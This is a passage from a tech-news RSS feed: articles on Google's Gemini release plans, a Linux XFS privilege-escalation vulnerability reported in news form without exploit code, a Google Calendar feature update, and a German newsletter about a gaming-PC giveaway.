<p class="wp-block-paragraph">“We are creating a baseline on top of which you will see us rapidly iterate on subsequent model releases. And so picking up pace and releasing models almost at a monthly cadence is part of our road map as we are building Gemini 4 as well,” Pichai said during the <a href="https://www.youtube.com/watch?v=LzExSq9DU9w" target="_blank" rel="noreferrer noopener">call</a>.</p>



<p class="wp-block-paragraph">Sandler’s question followed one from JPMorgan Chase &amp; Co analyst <a href="https://www.linkedin.com/in/douglas-anmuth-9229621/" target="_blank" rel="noreferrer noopener">Douglas Anmuth</a>, who asked Pichai if Google was releasing frontier AI models frequently enough to keep pace with rivals OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Pichai had responded to Anmuth’s question that Google remained confident of competing at the frontier and was investing heavily in a larger Gemini 4 base model.</p>



<p class="wp-block-paragraph">Analysts, though, aren’t as confident as Pichai.</p>



<p class="wp-block-paragraph">While delays to Google’s frontier model roadmap have not triggered an exodus of existing customers, either because of high switching costs or because many enterprises already running multi-model architectures, they have made CIOs evaluating AI platforms more cautious about making new commitments, said <a href="https://www.linkedin.com/in/bhupendrachopra" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, chief revenue officer at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">A monthly model release cadence could prove to be a double-edged sword for enterprises and their CIOs.</p>



<p class="wp-block-paragraph">While a monthly release cadence could help enterprises gain faster access to improvements in model performance, cost and capabilities, it will also require CIOs to invest more heavily in testing, governance and version management to safely adopt those updates, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research.</p>



<p class="wp-block-paragraph">Similarly, <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting, said enterprises will embrace a faster release cadence only if each successive model delivers measurable improvements in performance, cost or safety, rather than simply changing version number.</p>



<p class="wp-block-paragraph">The challenge for CIOs, Jain said, is not just keeping up with model releases; it’s deciding whether each new version is worth the cost of validating it.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.infoworld.com/article/4200818/google-ceo-distracts-from-gemini-3-5-pro-delay-with-talk-of-gemini-4-and-monthly-releases.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google CEO distracts from Gemini 3.5 Pro delay with talk of Gemini 4 and monthly releases]]></title>
<description><![CDATA[Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent L...]]></description>
<link>https://tsecurity.de/de/3689683/it-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689683/it-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</guid>
<pubDate>Thu, 23 Jul 2026 18:35:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent LLMs at an almost monthly cadence.</p>



<p class="wp-block-paragraph">His comments came a day after <a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-cyber/" target="_blank" rel="noreferrer noopener">Google unveiled Gemini 3.6 Flash</a> and 3.5 Flash Cyber but offered no update on the release of Gemini 3.5 Pro, the company’s delayed flagship reasoning model that many developers had expected to arrive weeks earlier.</p>



<p class="wp-block-paragraph">Google introduced the Gemini 3.5 family at its annual I/O conference, promising to release the Pro model in June. That timeline has since slipped, with <a href="http://bloomberg.com/news/articles/2026-07-16/google-gemini-launch-delayed-as-tech-falls-short-of-internal-goals" target="_blank" rel="noreferrer noopener">Bloomberg suggesting Gemini 3.5 Pro is months late</a> because the model’s coding performance is falling short of internal expectations, especially when compared to better performance by similar models from OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Instead of revisiting the Gemini 3.5 Pro timeline, Pichai used the earnings call to shift the discussion toward Gemini 4, when asked about how his company planned to navigate an increasingly competitive race to release frontier AI models by to Barclays Investment Bank analyst Ross Sandler.</p>



<p class="wp-block-paragraph">“We are creating a baseline on top of which you will see us rapidly iterate on subsequent model releases. And so picking up pace and releasing models almost at a monthly cadence is part of our road map as we are building Gemini 4 as well,” Pichai said during the <a href="https://www.youtube.com/watch?v=LzExSq9DU9w" target="_blank" rel="noreferrer noopener">call</a>.</p>



<p class="wp-block-paragraph">Sandler’s question followed one from JPMorgan Chase &amp; Co analyst <a href="https://www.linkedin.com/in/douglas-anmuth-9229621/" target="_blank" rel="noreferrer noopener">Douglas Anmuth</a>, who asked Pichai if Google was releasing frontier AI models frequently enough to keep pace with rivals OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Pichai had responded to Anmuth’s question that Google remained confident of competing at the frontier and was investing heavily in a larger Gemini 4 base model.</p>



<p class="wp-block-paragraph">Analysts, though, aren’t as confident as Pichai.</p>



<p class="wp-block-paragraph">While delays to Google’s frontier model roadmap have not triggered an exodus of existing customers, either because of high switching costs or because many enterprises already running multi-model architectures, they have made CIOs evaluating AI platforms more cautious about making new commitments, said <a href="https://www.linkedin.com/in/bhupendrachopra" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, chief revenue officer at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">A monthly model release cadence could prove to be a double-edged sword for enterprises and their CIOs.</p>



<p class="wp-block-paragraph">While a monthly release cadence could help enterprises gain faster access to improvements in model performance, cost and capabilities, it will also require CIOs to invest more heavily in testing, governance and version management to safely adopt those updates, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research.</p>



<p class="wp-block-paragraph">Similarly, <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting, said enterprises will embrace a faster release cadence only if each successive model delivers measurable improvements in performance, cost or safety, rather than simply changing version number.</p>



<p class="wp-block-paragraph">The challenge for CIOs, Jain said, is not just keeping up with model releases; it’s deciding whether each new version is worth the cost of validating it.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.infoworld.com/article/4200818/google-ceo-distracts-from-gemini-3-5-pro-delay-with-talk-of-gemini-4-and-monthly-releases.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux XFS has a decade-old race condition allowing full root access]]></title>
<description><![CDATA[Linux systems using the XFS filesystem suffer from a race condition that could enable an unprivileged local user to gain full root access.



The flaw affects systems with Linux kernel 4.11 or later that have enabled the XFS feature reflink, which permits the creation of copies of a file without ...]]></description>
<link>https://tsecurity.de/de/3689585/it-security-nachrichten/linux-xfs-has-a-decade-old-race-condition-allowing-full-root-access/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689585/it-security-nachrichten/linux-xfs-has-a-decade-old-race-condition-allowing-full-root-access/</guid>
<pubDate>Thu, 23 Jul 2026 17:59:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Linux systems using the XFS <a href="https://www.networkworld.com/article/3631604/linux-filesystems-ext4-btrfs-xfs-zfs-and-more.html">filesystem</a> suffer from a race condition that could enable an unprivileged local user to gain full root access.</p>



<p class="wp-block-paragraph">The flaw affects systems with Linux kernel 4.11 or later that have enabled the XFS feature reflink, which permits the creation of copies of a file without actually copying its data.</p>



<p class="wp-block-paragraph">According to Qualys Threat Research Unit (TRU), there was a way around the file write protections reflink depends on. The bypass has existed in kernel versions since 2017 before a <a href="https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=e705d81a7193dd19e69b8e2bad4696d78a4ea075" target="_blank" rel="noreferrer noopener">patch was made available</a> last week.</p>



<p class="wp-block-paragraph">“Using this vulnerability, a process running as an ordinary, unprivileged user can trigger the flaw and gain the ability to overwrite any readable file on an XFS volume at the block layer,” <a href="https://www.linkedin.com/in/saeedabbasi/" target="_blank" rel="noreferrer noopener">Saeed Abbasi</a>, head of Qualys TRU, said in a blog post about the vulnerability, which he calls  <a href="https://blog.qualys.com/vulnerabilities-threat-research/2026/07/22/refluxfs-a-linux-kernel-local-privilege-escalation-to-root-in-xfs-cve-2026-64600" target="_blank" rel="noreferrer noopener">RefluXFS</a>. “Exploitation is highly reliable and leaves no kernel log output.”</p>



<p class="wp-block-paragraph">Qualys estimated that the issue affects more than 16.4 million systems, primarily enterprise Linux deployments that use XFS with reflink enabled by default.</p>



<h2 class="wp-block-heading">Race winner gets root in buggy file operation</h2>



<p class="wp-block-paragraph">The vulnerability, tracked as <a href="https://www.cve.org/CVERecord?id=CVE-2026-64600" target="_blank" rel="noreferrer noopener">CVE-2026-64600</a>, stemmed from the way XFS handles copy-on-write operations for reflinked files. Normally, when two files share the same storage block, as in the case of an original file and the reflinked clone, XFS allocates a new storage block before any data modification, so the original file remains unchanged.</p>



<p class="wp-block-paragraph">However, a race condition occurs when two concurrent writes on the reflink file are initiated, confusing the filesystem into modifying the original file. “The change is made directly on disk, persists across reboots, and produces no kernel log output,” Qualys said in an <a href="https://cdn2.qualys.com/advisory/2026/07/22/RefluXFS.txt" target="_blank" rel="noreferrer noopener">advisory</a>.</p>



<p class="wp-block-paragraph">The issue is exploitable when Linux 4.11+, XFS with reflink enabled, and a shared filesystem layout are all present. It is assigned a high severity CVSS of 7.8 out of 10 as an exploit only needs read access to a target file before creating a reflink clone under a writable directory on the same XFS filesystem.</p>



<h2 class="wp-block-heading">Linux distributions affected by RefluXFS</h2>



<p class="wp-block-paragraph">The vulnerability has been present in every mainline and stable Linux kernel since the release of version 4.11 in 2017, and requires no special capabilities or non-default configurations, Qualys said.</p>



<p class="wp-block-paragraph">Affected Linux distributions include RHEL 8,9 and 10, CentOS Stream 8,9, and 10, Oracle Linux 8,9,10, Rocky and AlmaLinux 8,9, and 10, CloudLinux 8,9, and 10, Amazon Linux 2023 and Amazon Linux 2 AMIs from December 2022 onward, Fedora Server 31+, and Debian, Ubuntu and SUSE installations where XFS was manually selected.</p>



<p class="wp-block-paragraph">Usual kernel hardening practices, including memory protection features like <a href="https://www.csoonline.com/article/559839/self-protection-is-key-to-linux-kernel-security.html">Kernel Address Space Layout Randomization</a> (KASLR), Supervisor Mode Access Prevention (SMAP), and Supervisor Mode Execution Prevention (SMEP), are ineffective as they are all aimed at different attack surfaces. Even a kernel lockdown does nothing to stop the affected path, Qualys noted.</p>



<p class="wp-block-paragraph">“SELinux doesn’t block the affected path in testing, and seccomp profiles are no barrier as long as they permit write and ioctl, which ordinary profiles do,” Abbasi explained. Immediate kernel patching and a full reboot are the only reliable mitigations, he added.</p>



<p class="wp-block-paragraph">A fix was merged into the upstream Linux kernel source tree on July 16 as commit “2f4acd0,” after which Linux distributions began backporting the patch into their own supported kernel releases.</p>



<p class="wp-block-paragraph">Organizations running affected XFS deployments should apply their Linux vendor’s latest kernel updates and reboot affected systems once fixed kernels become available.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux XFS has a decade-old race condition allowing full root access]]></title>
<description><![CDATA[Linux systems using the XFS filesystem suffer from a race condition that could enable an unprivileged local user to gain full root access.



The flaw affects systems with Linux kernel 4.11 or later that have enabled the XFS feature reflink, which permits the creation of copies of a file without ...]]></description>
<link>https://tsecurity.de/de/3689584/it-security-nachrichten/linux-xfs-has-a-decade-old-race-condition-allowing-full-root-access/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689584/it-security-nachrichten/linux-xfs-has-a-decade-old-race-condition-allowing-full-root-access/</guid>
<pubDate>Thu, 23 Jul 2026 17:58:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Linux systems using the XFS <a href="https://www.networkworld.com/article/3631604/linux-filesystems-ext4-btrfs-xfs-zfs-and-more.html">filesystem</a> suffer from a race condition that could enable an unprivileged local user to gain full root access.</p>



<p class="wp-block-paragraph">The flaw affects systems with Linux kernel 4.11 or later that have enabled the XFS feature reflink, which permits the creation of copies of a file without actually copying its data.</p>



<p class="wp-block-paragraph">According to Qualys Threat Research Unit (TRU), there was a way around the file write protections reflink depends on. The bypass has existed in kernel versions since 2017 before a <a href="https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=e705d81a7193dd19e69b8e2bad4696d78a4ea075" target="_blank" rel="noreferrer noopener">patch was made available</a> last week.</p>



<p class="wp-block-paragraph">“Using this vulnerability, a process running as an ordinary, unprivileged user can trigger the flaw and gain the ability to overwrite any readable file on an XFS volume at the block layer,” <a href="https://www.linkedin.com/in/saeedabbasi/" target="_blank" rel="noreferrer noopener">Saeed Abbasi</a>, head of Qualys TRU, said in a blog post about the vulnerability, which he calls  <a href="https://blog.qualys.com/vulnerabilities-threat-research/2026/07/22/refluxfs-a-linux-kernel-local-privilege-escalation-to-root-in-xfs-cve-2026-64600" target="_blank" rel="noreferrer noopener">RefluXFS</a>. “Exploitation is highly reliable and leaves no kernel log output.”</p>



<p class="wp-block-paragraph">Qualys estimated that the issue affects more than 16.4 million systems, primarily enterprise Linux deployments that use XFS with reflink enabled by default.</p>



<h2 class="wp-block-heading">Race winner gets root in buggy file operation</h2>



<p class="wp-block-paragraph">The vulnerability, tracked as <a href="https://www.cve.org/CVERecord?id=CVE-2026-64600" target="_blank" rel="noreferrer noopener">CVE-2026-64600</a>, stemmed from the way XFS handles copy-on-write operations for reflinked files. Normally, when two files share the same storage block, as in the case of an original file and the reflinked clone, XFS allocates a new storage block before any data modification, so the original file remains unchanged.</p>



<p class="wp-block-paragraph">However, a race condition occurs when two concurrent writes on the reflink file are initiated, confusing the filesystem into modifying the original file. “The change is made directly on disk, persists across reboots, and produces no kernel log output,” Qualys said in an <a href="https://cdn2.qualys.com/advisory/2026/07/22/RefluXFS.txt" target="_blank" rel="noreferrer noopener">advisory</a>.</p>



<p class="wp-block-paragraph">The issue is exploitable when Linux 4.11+, XFS with reflink enabled, and a shared filesystem layout are all present. It is assigned a high severity CVSS of 7.8 out of 10 as an exploit only needs read access to a target file before creating a reflink clone under a writable directory on the same XFS filesystem.</p>



<h2 class="wp-block-heading">Linux distributions affected by RefluXFS</h2>



<p class="wp-block-paragraph">The vulnerability has been present in every mainline and stable Linux kernel since the release of version 4.11 in 2017, and requires no special capabilities or non-default configurations, Qualys said.</p>



<p class="wp-block-paragraph">Affected Linux distributions include RHEL 8,9 and 10, CentOS Stream 8,9, and 10, Oracle Linux 8,9,10, Rocky and AlmaLinux 8,9, and 10, CloudLinux 8,9, and 10, Amazon Linux 2023 and Amazon Linux 2 AMIs from December 2022 onward, Fedora Server 31+, and Debian, Ubuntu and SUSE installations where XFS was manually selected.</p>



<p class="wp-block-paragraph">Usual kernel hardening practices, including memory protection features like <a href="https://www.csoonline.com/article/559839/self-protection-is-key-to-linux-kernel-security.html">Kernel Address Space Layout Randomization</a> (KASLR), Supervisor Mode Access Prevention (SMAP), and Supervisor Mode Execution Prevention (SMEP), are ineffective as they are all aimed at different attack surfaces. Even a kernel lockdown does nothing to stop the affected path, Qualys noted.</p>



<p class="wp-block-paragraph">“SELinux doesn’t block the affected path in testing, and seccomp profiles are no barrier as long as they permit write and ioctl, which ordinary profiles do,” Abbasi explained. Immediate kernel patching and a full reboot are the only reliable mitigations, he added.</p>



<p class="wp-block-paragraph">A fix was merged into the upstream Linux kernel source tree on July 16 as commit “2f4acd0,” after which Linux distributions began backporting the patch into their own supported kernel releases.</p>



<p class="wp-block-paragraph">Organizations running affected XFS deployments should apply their Linux vendor’s latest kernel updates and reboot affected systems once fixed kernels become available.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.networkworld.com/article/4200802/linux-xfs-has-a-decade-old-race-condition-allowing-full-root-access.html">Network World</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[View supporting calendar delegates in meeting guest list]]></title>
<description><![CDATA[When viewing a guest list in Google Calendar on the web, you will now see a new icon next to leaders who have a calendar delegate assisting them with scheduling support. Hovering over the icon will display the person’s information, allowing you to easily initiate a chat with them directly.This up...]]></description>
<link>https://tsecurity.de/de/3689570/web-tipps/view-supporting-calendar-delegates-in-meeting-guest-list/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689570/web-tipps/view-supporting-calendar-delegates-in-meeting-guest-list/</guid>
<pubDate>Thu, 23 Jul 2026 17:53:35 +0200</pubDate>
<category>Web Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>When viewing a guest list in Google Calendar on the web, you will now see a new icon next to leaders who have a calendar delegate assisting them with scheduling support. Hovering over the icon will display the person’s information, allowing you to easily initiate a chat with them directly.</p><p>This update helps users quickly identify and contact the appropriate scheduling support for a leader to streamline communication and event coordination.</p><p>This icon is visible in several calendar views:</p><p></p><ul><li>Event details view</li><li>Full-screen creation</li><li>Side-by-side scheduling view</li></ul><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container"><tbody><tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5LMGon8DbvIb75H_NX_sx-bv3oZdCH0fI7MNaovk7fUKW416L0sBvXFFMxIywQ5fkZz8Oitaef7ZyqSmAlcXlZMD-2trC1cWq6W99epBcQ7eZe97reUsFk7Cpdlb-FjEdZ0QvJVxLi5M2VZ3vSbpL_elrrPyPTzYxqKy9irfz5h7lc4xlmNiL8V2X_Wk/s1180/View%20supporting%20calendar%20delegates%20in%20meeting%20guest%20list%20-%207060.png"><img border="0" data-original-height="452" data-original-width="1180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5LMGon8DbvIb75H_NX_sx-bv3oZdCH0fI7MNaovk7fUKW416L0sBvXFFMxIywQ5fkZz8Oitaef7ZyqSmAlcXlZMD-2trC1cWq6W99epBcQ7eZe97reUsFk7Cpdlb-FjEdZ0QvJVxLi5M2VZ3vSbpL_elrrPyPTzYxqKy9irfz5h7lc4xlmNiL8V2X_Wk/s1600/View%20supporting%20calendar%20delegates%20in%20meeting%20guest%20list%20-%207060.png"></a></td></tr><tr><td class="tr-caption"><br>New icon surfacing the calendar delegate of a leader in the guest list in event details view</td></tr></tbody></table><h3>Getting started</h3><p></p><ul><li><b>Admins: </b>There is no admin control for this feature.</li><li><b>End users: </b>There is no end-user setting for this feature. Simply hover over the icon next to the person’s name to see more information about their scheduling support.</li></ul><p></p><h3>Rollout pace</h3><p></p><ul><li><a href="https://support.google.com/a/answer/172177" target="_blank">Rapid Release domains:</a> Gradual rollout (up to 15 days for feature visibility) starting on July 23, 2026</li><li><a href="https://support.google.com/a/answer/172177" target="_blank">Scheduled Release domains:</a> Full rollout (1–3 days for feature visibility) starting on August 3, 2026</li></ul><p></p><h3>Availability</h3><p></p><ul><li>Available to all Google Workspace customers, Workspace Individual subscribers, and users with personal Google accounts</li></ul><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zwei RTX 5090 für die HMX 6 und Zeitreise zur Höllenmaschine 4 mit vier GPUs]]></title>
<description><![CDATA[Hallo, ich bin der Michi, willkommen zur vierten Ausgabe des HMX-6-Newsletters. Diese Woche erfahrt ihr, welche Grafikkarten wir in der HMX 6 verbauen. Außerdem verraten wir, warum Halo das Design der HMX 6 prägen wird. Außerdem reisen wir zurück ins Jahr 2012 zur Höllenmaschine 4, die mit vier G...]]></description>
<link>https://tsecurity.de/de/3689498/it-nachrichten/zwei-rtx-5090-fuer-die-hmx-6-und-zeitreise-zur-hoellenmaschine-4-mit-vier-gpus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689498/it-nachrichten/zwei-rtx-5090-fuer-die-hmx-6-und-zeitreise-zur-hoellenmaschine-4-mit-vier-gpus/</guid>
<pubDate>Thu, 23 Jul 2026 17:32:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Hallo, ich bin der Michi, willkommen zur vierten Ausgabe des HMX-6-Newsletters. Diese Woche erfahrt ihr, welche Grafikkarten wir in der HMX 6 verbauen. Außerdem verraten wir, warum Halo das Design der HMX 6 prägen wird. Außerdem reisen wir zurück ins Jahr 2012 zur Höllenmaschine 4, die mit vier Grafikprozessoren neue Maßstäbe beim Gaming setzte. Wenn ihr keine Ausgabe verpassen wollt, könnt ihr den <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">Newsletter kostenlos abonnieren</a> – aber vergesst nicht, die Anmeldung via E-Mail zu bestätigen. Viel Spaß beim Lesen!</p>



<p>Hier geht es direkt <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">zum Gewinnspiel der HMX 6 im Gesamtwert von 40.000 Euro</a>. </p>



<h2 class="wp-block-heading toc">HMX 6: 2x RTX 5090 von ZOTAC GAMING und Halo-Design</h2>



<p>Jetzt können wir endlich verraten, welche Grafikkarten in der HMX 6 stecken: Als primäre Gaming-Grafikkarte der HMX 6 ist die RTX 5090 AMP Extreme INFINITY gedacht, während wir parallel dazu die RTX 5090 ARCTICSTORM AIO für <a href="https://store.steampowered.com/app/993090/Lossless_Scaling/" target="_blank" rel="noreferrer noopener">verlustfreie Skalierung</a> verwenden, um Bildqualität und -wiederholrate in praktisch jedem Videospiel zu verbessern. Natürlich könnt ihr die gebündelte Kraft der zwei 5090 auch im kreativen Einsatz nutzen, etwa beim 3D-Rendering oder KI-Berechnungen. Hier findet ihr alle Informationen zu den <a href="https://www.pcwelt.de/article/3193773/hoellenmaschine-hmx-6-mit-zwei-rtx-5090-von-zotac-gaming.html" target="_blank" rel="noreferrer noopener">zwei ZOTAC-Grafikkarten</a>. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6233f4c25ef"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/ZOTAC-600.jpg?quality=50&amp;strip=all" alt="ZOTAC 600" class="wp-image-3196875" width="600" height="577" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">ZOTAC</p></div>



<p>Eigentlich wollten Kris und ich euch diese Woche schon den aktuellen Stand des Casecon im <a href="https://www.pcwelt.de/article/3194747/hoellenmaschine-hmx-6-im-halo-campaign-evolved-design.html" target="_blank" rel="noreferrer noopener">Halo-Design</a> zeigen. Doch unserem Modder <a href="https://dcmm.de/media/uploads/2023/04/SIEGER_POKAL_012.jpg" target="_blank" rel="noreferrer noopener">Stefan Ulrich</a> fehlen noch diverse Materialien. Jetzt fahren wir wahrscheinlich nächste Woche, doch die Zeit drängt schon wieder, denn wir wollen ja auf die Gamescom mit der HMX 6.</p>



<h2 class="wp-block-heading toc">Rückblick: Die Höllenmaschine 4 setzte technische und optische Maßstäbe</h2>



<p>Neue Maßstäbe setzten wir 2012 auch bei der Vermarktung der Höllenmaschine 4 – zumindest für unsere Verhältnisse: vier aufwendig produzierte <a href="https://www.youtube.com/watch?v=uY7XIARRvZw&amp;t=1s">Teaser-Videos</a> mit Engelchen und Teufelsdamen sowie Fritz als Padawan von Obi-Wan Michi. Das hat riesigen Spaß gemacht und uns als Team Hölle zusammengeschweißt – und war der Beginn einer wunderbaren Freundschaft. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6233f4c2e99"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/HM4-600.jpg?quality=50&amp;strip=all" alt="HM4 600" class="wp-image-3196869" width="600" height="563" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PC-WELT</p></div>



<p>Technisch auf der Höhe der Zeit waren wir mit den beiden Grafikkarten ASUS GTX690-4GD5, die jeweils zwei 915 MHz schnelle Nvidia Geforce GTX 690 beherbergten. Vier Grafikprozessoren gleichzeitig waren damals absoluter Wahnsinn und sorgten regelmäßig für offene Münder. Dazu gab es den Sechskerner Intel Core i7-3960X, 64 GB RAM im Vierkanalmodus, mit der OCZ RevoDrive die erste PCIe-SSD in einer Höllenmaschine und mit 10 Terabyte natürlich auch wieder verrückt viel HDD-Speicherplatz.</p>



<p>Sein höllisch gutes Aussehen verdankt das Gehäuse den international bekannten Casemoddern <a href="https://www.babetech.de/index.php/ueber-uns">Martin und Stefan Blass</a>. Sie haben ins Cooler Master Cosmos II ein Sichtfenster gefräst und per Airbrush lodernde Flammen auf die beiden Flügeltüren gezaubert. ARGB war damals noch kein Thema, aber mit dem Multidimmer von Richter waren immerhin individuelle Farbtöne und -wechsel per IR-Fernbedienung möglich. Hier geht es zum liebevoll restaurierten <a href="https://www.pcwelt.de/article/3188806/vor-14-jahren-pc-welt-verlost-hoellenmaschine-4-fuer-13333-euro.html" target="_blank" rel="noreferrer noopener">Artikel zur Höllenmaschine 4 aus 2012</a>.</p>



<h2 class="wp-block-heading toc">Maus mit Noctua-Lüfter und Steam Machine im Praxis-Test </h2>



<p>Diese Woche ist eine skurrile Mail in meinem Postfach gelandet: Pulsar und Noctua präsentieren stolz die Früchte ihrer Zusammenarbeit: die <a href="https://www.noctua.at/en/news/pulsar-and-noctua-release-feinmann-f01-noctua-edition-gaming-mouse">Feinmann F01 Noctua Edition</a>, eine Gaming-Maus mit aktiver Belüftung der Handflächen. Ich bin gespannt, wer sich über kühlere Handflächen beim Zocken freut.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6233f4c38f4"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Feinmann-F01-Noctua-Edition.jpg?quality=50&amp;strip=all" alt="Feinmann F01 Noctua Edition" class="wp-image-3196763" width="600" height="600" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
